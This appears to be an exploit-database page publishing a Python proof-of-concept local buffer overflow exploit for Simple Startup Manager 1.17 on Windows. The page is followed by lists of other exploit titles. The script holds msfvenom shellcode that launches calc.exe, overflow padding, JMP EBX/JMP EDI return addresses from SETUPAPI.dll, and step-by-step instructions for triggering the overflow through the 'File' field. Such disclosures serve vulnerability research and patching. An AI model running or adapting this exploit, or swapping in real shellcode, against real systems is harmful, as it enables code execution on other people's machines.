Menu

Search for hundreds of thousands of exploits

"Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)"

Author

Exploit author

PovlTekstTV

Platform

Exploit platform

windows

Release date

Exploit published date

2020-07-17

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
# Exploit Title: Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC) 
# Exploit Author: PovlTekstTV
# Date: 2020-07-15
# Vulnerable Software: Simple Startup Manager
# Software Link Download: http://www.ashkon.com/download/startup-manager.exe
# Version: 1.17
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 and 64 bit)
# DEP and ASLR Disabled on system
# Space for shellcode: 264

#!/usr/bin/python
# Two sets of instructions are needed:
# 1. JMP EDI
# 2. JMP EBX 
# I found these in the OS-module: SETUPAPI.dll, which is usually protected using ASLR
# The exploit will properly not work unless changed/bruteforced.

# It is also possible to overwrite the SEH-handler with 600+ bytes,
# however I did not find any POP, POP, RETs.

# Walkthrough:
#   1.- Run the python script, it will create a new file "exploit.txt"
#   2.- Copy the content of the new file 'exploit.txt' to clipboard
#   3.- Turn off DEP for startup-manger.exe
#   4.- Open 'startup-manger.exe'
#   5.- Click 'New' or go to 'File' and click 'New'
#   6.- Paste content from clipboard into 'File' parameter
#   7.- Click on 'OK'
#   9.- Calc.exe runs.

#Identified the following badchars: x00 x0a x09 x0c x0d x3a x5c
#msfvenom -p windows/exec cmd=calc.exe -f c -b "\x00\x0a\x0c\x0d\x3a\x5c"
shellcode = ("\xdb\xd0\xd9\x74\x24\xf4\xbe\xcb\xe3\xc2\xa5\x5a\x33\xc9\xb1"
"\x31\x83\xc2\x04\x31\x72\x14\x03\x72\xdf\x01\x37\x59\x37\x47"
"\xb8\xa2\xc7\x28\x30\x47\xf6\x68\x26\x03\xa8\x58\x2c\x41\x44"
"\x12\x60\x72\xdf\x56\xad\x75\x68\xdc\x8b\xb8\x69\x4d\xef\xdb"
"\xe9\x8c\x3c\x3c\xd0\x5e\x31\x3d\x15\x82\xb8\x6f\xce\xc8\x6f"
"\x80\x7b\x84\xb3\x2b\x37\x08\xb4\xc8\x8f\x2b\x95\x5e\x84\x75"
"\x35\x60\x49\x0e\x7c\x7a\x8e\x2b\x36\xf1\x64\xc7\xc9\xd3\xb5"
"\x28\x65\x1a\x7a\xdb\x77\x5a\xbc\x04\x02\x92\xbf\xb9\x15\x61"
"\xc2\x65\x93\x72\x64\xed\x03\x5f\x95\x22\xd5\x14\x99\x8f\x91"
"\x73\xbd\x0e\x75\x08\xb9\x9b\x78\xdf\x48\xdf\x5e\xfb\x11\xbb"
"\xff\x5a\xff\x6a\xff\xbd\xa0\xd3\xa5\xb6\x4c\x07\xd4\x94\x1a"
"\xd6\x6a\xa3\x68\xd8\x74\xac\xdc\xb1\x45\x27\xb3\xc6\x59\xe2"
"\xf0\x39\x10\xaf\x50\xd2\xfd\x25\xe1\xbf\xfd\x93\x25\xc6\x7d"
"\x16\xd5\x3d\x9d\x53\xd0\x7a\x19\x8f\xa8\x13\xcc\xaf\x1f\x13"
"\xc5\xd3\xfe\x87\x85\x3d\x65\x20\x2f\x42")

payload = shellcode
payload += ("A"*(268-len(payload)-4))
payload += ("\xe4\xa9\x4e\x76") #0x764ea9e4 (JMP EBX) {PAGE_READONLY} [SETUPAPI.dll]
payload += ("\x5f\xbc\x4e\x76") #0x764ebc5f (JMP EDI) {PAGE_READONLY} [SETUPAPI.dll]

#Write payload to file
file = open("exploit.txt" , 'w')
file.write(payload)
file.close()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-07-17 "Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)" local windows PovlTekstTV
2019-06-13 "Pronestor Health Monitoring < 8.1.11.0 - Privilege Escalation" local windows PovlTekstTV 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected